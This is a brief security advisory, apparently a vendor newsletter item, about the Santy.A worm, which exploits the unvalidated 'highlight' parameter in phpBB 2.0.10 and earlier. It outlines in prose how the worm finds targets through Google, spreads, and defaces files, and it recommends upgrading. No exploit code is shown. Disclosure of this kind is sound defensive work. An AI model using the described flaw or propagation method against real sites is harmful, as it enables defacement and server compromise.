|
|
Santy.A WebWorm attack vulnerability of phpBB
|
phpBB is a free open-source Web bulletin board software package. phpBB v2.0 - v2.0.10 are vulnerable to an input validation problem.
viewtopic.php is fails to properly perform an urldecode() on the "highlight" parameter, A remote attacker could exploit the vulnerability, which would deface a phpBB website and execute arbitrary commands.
Santy.A is a worm that spreads via web servers running phpBB 2.x prior to 2.0.11. It constructs a search query using the Google search engine to find web servers running phpBB,
then attempts to attack and install a copy itself to the vulnerable server. If successful, the worm would overwrites files with the following extensions: .asp, .htm, .jsp, .php, .phtm, .shtm. with this message:
This site is defaced!!!
NeverEverNoSanity WebWorm generation (number of infection)
|
DragonSoft Security Team urges the phpBB's user, upgrade to phpBB v2.0.11 to prevent exploitation.
Relate Links:
Exploit:
Vulnerability Assessment:
|
About DragonSoft Security Associates, Inc.
DragonSoft Security Associates is a leading developer in Taiwan for network security software and an active contributor to network security education. Founded in 2002, DragonSoft offers vulnerability management olutions, including vulnerability assessment, System Security Management and intrusion prevention.
|
Tel. +886-3-5630989 Fax. +886-3-5797758
6F, No. 30, Lane 607, Sec. 1, Guangfu Rd., Hsinchu, Taiwan 300. R.O.C
Copyright © DragonSoft Security Associates, Inc. All Rights Reserved
| About | Unsubscribe | Contact |
|
|
